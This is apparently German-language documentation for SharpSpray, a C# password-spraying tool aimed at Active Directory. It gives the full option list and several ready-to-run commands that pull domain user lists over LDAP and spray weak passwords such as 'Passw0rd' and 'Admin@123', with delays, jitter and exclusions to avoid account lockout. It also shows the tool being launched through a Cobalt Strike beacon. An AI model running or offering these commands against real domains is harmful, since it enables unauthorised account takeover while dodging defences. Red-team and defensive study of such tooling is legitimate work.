
Active Directory-Passwort-Spraying-Tool. Holt automatisch die Benutzerliste und vermeidet potenzielle Sperrungen.
SharpSpray ist ein Tool zum Durchführen von Passwort-Spraying in Windows-Domänen, geschrieben in .NET C#.
SharpSpray ist ein C#-Port von DomainPasswordSpray mit erweiterten und zusätzlichen Funktionen. Dieses Tool verwendet das LDAP-Protokoll, um mit den Active Directory-Diensten der Domäne zu kommunizieren.
> SharpSpray.exe --help
-v, --Verbose Ausführliche Meldungen anzeigen.
-u (Optional) Pfad zur Benutzernamenliste. Wird automatisch aus dem Active Directory abgerufen, falls nicht angegeben.
-p Ein einzelnes Passwort oder eine mit '|' getrennte Liste von Passwörtern, die für das Passwort-Spraying verwendet werden.
-k, --pl (Optional) Pfad zur Passwortliste.
-d (Optional) Geben Sie einen Domänennamen an.
-m Verwenden Sie diese Option, wenn Sie von einem Host aus sprühen, der sich außerhalb des Domänenkontextes befindet.
-q, --dc-ip Erforderlich, wenn die Option 'm' (OutsideDomain) aktiviert ist.
-x Versucht, deaktivierte Konten aus der Benutzerliste auszuschließen (Nicht unterstützt mit der Option -m).
-z Konten ausschließen, die nur noch einen Versuch von der Sperrung entfernt sind (Nicht unterstützt mit der Option -m).
-f Benutzerdefinierter LDAP-Filter für Benutzer, z. B. "(description=*admin*)"
-o Eine Datei, in die die Ergebnisse ausgegeben werden.
-w Verwenden Sie nicht die Domänen-Sperrbeobachtungsfenster-Einstellungen, sondern diesen spezifischen Wert. (Standard: 32 Minuten)
-s (Optional) Verzögerung in Sekunden zwischen jedem Authentifizierungsversuch.
-j (Optional) Jitter in Sekunden.
--Force Erzwungener Start ohne Bestätigungsabfrage.
--get-users-list Ruft die Liste der Domänenbenutzer aus dem Active Directory ab.
--show-examples Ruft die Liste der Domänenbenutzer aus dem Active Directory ab.
--show-args Zeigt die Kommandozeilenargumente an.
--help Zeigt diese Hilfeseite an.
SharpSpray.exe -v -x -z --pl password.txt
SharpSpray.exe -v -x -z -p "Passw0rd|Admin@123|Admin@2022"
SharpSpray.exe -v -x -z -p "Passw0rd"
SharpSpray.exe -x -z -u users.txt --pl psswd.txt
SharpSpray.exe -x -z -u users.txt -p Passw0rd!
SharpSpray.exe -x -z -s 3 -j 1 -u users.txt -k psswd.txt -o sprayed.txt
SharpSpray.exe -w 32 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe -w 32 -s 3 -j 1 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe --get-users-list
SharpSpray.exe --get-users-list > users.txt
PS> .\SharpSpray.exe --get-users-list | Out-File -Encoding ascii users.txt
* Verwendung in Cobalt Strike:
beacon> execute-assembly C:\Users\sec\Desktop\tmp\sharpspray.exe --Force -w 32 -s 3 -j 1 -x -z -v -p "Passw0rd|Admin@123|Admin@2022"
* Jobs in Cobalt überprüfen:
beacon> jobs
Der folgende Befehl ruft die Domänenbenutzer ab und gibt die Liste auf der Konsole aus.
SharpSpray.exe -x -z --get-users-list
-x: Deaktivierte Konten aus der Benutzerliste ausschließen.
-z: Konten ausschließen, die nur noch einen Versuch von der Sperrung entfernt sind.